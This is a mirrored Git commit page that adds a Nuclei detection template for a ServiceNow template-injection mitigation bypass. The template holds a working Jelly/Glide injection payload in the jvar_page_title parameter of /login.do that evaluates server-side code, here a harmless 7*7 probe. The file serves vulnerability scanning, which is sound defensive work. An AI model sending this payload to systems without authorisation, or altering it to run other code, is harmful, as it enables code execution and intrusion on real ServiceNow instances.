daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create servicenow-ssti.yaml

patch-5
Dhiyaneshwaran 2024-07-11 12:04:11 +05:30 committed by GitHub
parent 064ae930b1
commit 9723a8da6a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 20 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
http/misconfiguration/servicenow-ssti.yaml Normal file
View File

@ -0,0 +1,20 @@
id: servicenow-ssti
info:
name: Service Now - Template Injection Mitigation Bypass
author: DhiyaneshDk
severity: high
http:
- raw:
- |
GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j="jelly"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<div class="outputmsg_text">49</div>'